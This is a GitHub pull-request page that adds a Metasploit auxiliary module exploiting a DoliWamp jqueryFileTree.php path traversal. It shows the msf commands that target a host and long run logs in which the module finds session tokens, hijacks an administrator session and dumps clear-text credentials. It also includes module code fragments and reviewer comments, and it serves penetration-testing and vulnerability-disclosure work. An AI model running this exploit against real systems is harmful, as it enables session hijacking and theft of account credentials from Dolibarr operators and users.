Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add DoliWamp 'jqueryFileTree.php' Traversal Gather Credentials module #2940

Merged
merged 1 commit into from Feb 10, 2014

Conversation

@bcoles
Copy link
Contributor

bcoles commented Feb 3, 2014

Add DoliWamp 'jqueryFileTree.php' Traversal Gather Credentials module.

Steals session tokens, attempts to hijack each session and gathers the user's username and password in clear text.

traversal

Example Output

msf> use auxiliary/gather/doliwamp_traversal_creds 
msf auxiliary(doliwamp_traversal_creds) > set RHOST 192.168.237.138
RHOST => 192.168.237.138
msf auxiliary(doliwamp_traversal_creds) > set VERBOSE true
VERBOSE => true
msf auxiliary(doliwamp_traversal_creds) > run

[*] 192.168.237.138:80 - Finding session tokens...
[+] 192.168.237.138:80 - Found 64 session tokens
[*] 192.168.237.138:80 - Trying to hijack a session...
[+] 192.168.237.138:80 - Found credentials (admin:admin)

Dolibarr User Credentials
=========================

 Username  Password  Admin  E-mail
 --------  --------  -----  ------
 admin     admin     Yes    

[*] Credentials saved in: /root/.msf4/loot/20140111063740_default_192.168.237.138_dolibarr.travers_981990.csv
[*] Auxiliary module execution completed

Example Verbose Output

msf> use auxiliary/gather/doliwamp_traversal_creds 
msf auxiliary(doliwamp_traversal_creds) > set RHOST 192.168.237.138
RHOST => 192.168.237.138
msf auxiliary(doliwamp_traversal_creds) > set VERBOSE true
VERBOSE => true
msf auxiliary(doliwamp_traversal_creds) > run

[*] 192.168.237.138:80 - Finding session tokens...
[+] 192.168.237.138:80 - Found 64 session tokens
[*] 192.168.237.138:80 - Trying to hijack a session...
[*] 192.168.237.138:80 - Trying to hijack a session -   1.56% done (1/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -   3.12% done (2/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -   4.69% done (3/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -   6.25% done (4/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -   7.81% done (5/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -   9.38% done (6/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  10.94% done (7/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  12.50% done (8/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  14.06% done (9/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  15.62% done (10/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  17.19% done (11/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  18.75% done (12/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  20.31% done (13/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  21.88% done (14/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  23.44% done (15/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  25.00% done (16/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  26.56% done (17/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  28.12% done (18/64 tokens)
[+] 192.168.237.138:80 - Hijacked session for user with ID '1'
[*] 192.168.237.138:80 - Retrieving user's credentials
[+] 192.168.237.138:80 - Found credentials (admin:admin)
[*] 192.168.237.138:80 - Trying to hijack a session -  29.69% done (19/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  31.25% done (20/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  32.81% done (21/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  34.38% done (22/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  35.94% done (23/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  37.50% done (24/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  39.06% done (25/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  40.62% done (26/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  42.19% done (27/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  43.75% done (28/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  45.31% done (29/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  46.88% done (30/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  48.44% done (31/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  50.00% done (32/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  51.56% done (33/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  53.12% done (34/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  54.69% done (35/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  56.25% done (36/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  57.81% done (37/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  59.38% done (38/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  60.94% done (39/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  62.50% done (40/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  64.06% done (41/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  65.62% done (42/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  67.19% done (43/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  68.75% done (44/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  70.31% done (45/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  71.88% done (46/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  73.44% done (47/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  75.00% done (48/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  76.56% done (49/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  78.12% done (50/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  79.69% done (51/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  81.25% done (52/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  82.81% done (53/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  84.38% done (54/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  85.94% done (55/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  87.50% done (56/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  89.06% done (57/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  90.62% done (58/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  92.19% done (59/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  93.75% done (60/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  95.31% done (61/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  96.88% done (62/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  98.44% done (63/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 100.00% done (64/64 tokens)

Dolibarr User Credentials
=========================

 Username  Password  Admin  E-mail
 --------  --------  -----  ------
 admin     admin     Yes    

[*] Credentials saved in: /root/.msf4/loot/20140111063740_default_192.168.237.138_dolibarr.travers_981990.csv
[*] Auxiliary module execution completed
vprint_good("#{peer} - Hijacked session for user with ID '#{user_id}'")
return user_id
else
# print_debug("#{peer} - Could not hijack session. Session is invalid.")

This comment has been minimized.

Copy link
@wchen-r7

wchen-r7 Feb 3, 2014

Contributor

Did you mean to leave this commented out? Looks like useful info for debugging purposes.

# Check for session tokens in 'tmp'
#
def check
get_session_tokens ? Exploit::CheckCode::Vulnerable : Exploit::CheckCode::Unknown

This comment has been minimized.

Copy link
@wchen-r7

wchen-r7 Feb 3, 2014

Contributor

You only should be using Unknown when you've failed to collected some info during the process due to a timeout or something. Your get_session_tokens method doesn't really turn that type of info, so all you can do is flag it Safe here.

This comment has been minimized.

@wchen-r7 wchen-r7 self-assigned this Feb 10, 2014
@wchen-r7

This comment has been minimized.

Copy link
Contributor

wchen-r7 commented Feb 10, 2014

Processing.

wchen-r7 added a commit that referenced this pull request Feb 10, 2014
@wchen-r7 wchen-r7 merged commit 9b9b2fa into rapid7:master Feb 10, 2014
1 check passed
1 check passed
default The Travis CI build passed
Details
@wchen-r7

This comment has been minimized.

Copy link
Contributor

wchen-r7 commented Feb 10, 2014

Verification:

msf auxiliary(doliwamp_traversal_creds) > run

[*] 10.*.***.***:8181 - Finding session tokens...
[+] 10.*.***.***:8181 - Found 8 session tokens
[*] 10.*.***.***:8181 - Trying to hijack a session...
[*] 10.*.***.***:8181 - Trying to hijack a session -  12.50% done (1/8 tokens)
[*] 10.*.***.***:8181 - Trying to hijack a session -  25.00% done (2/8 tokens)
[*] 10.*.***.***:8181 - Trying to hijack a session -  37.50% done (3/8 tokens)
[*] 10.*.***.***:8181 - Trying to hijack a session -  50.00% done (4/8 tokens)
[*] 10.*.***.***:8181 - Trying to hijack a session -  62.50% done (5/8 tokens)
[*] 10.*.***.***:8181 - Trying to hijack a session -  75.00% done (6/8 tokens)
[*] 10.*.***.***:8181 - Trying to hijack a session -  87.50% done (7/8 tokens)
[+] 10.*.***.***:8181 - Hijacked session for user with ID '1'
[*] 10.*.***.***:8181 - Retrieving user's credentials
[+] 10.*.***.***:8181 - Found credentials (admin:********)
[*] 10.*.***.***:8181 - Trying to hijack a session - 100.00% done (8/8 tokens)

Dolibarr User Credentials
=========================

 Username  Password  Admin  E-mail
 --------  --------  -----  ------
 admin     ********  Yes   
@bcoles bcoles deleted the bcoles:doliwamp_traversal_creds branch Apr 6, 2014
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
Linked issues

Successfully merging this pull request may close these issues.

None yet

2 participants
You can’t perform that action at this time.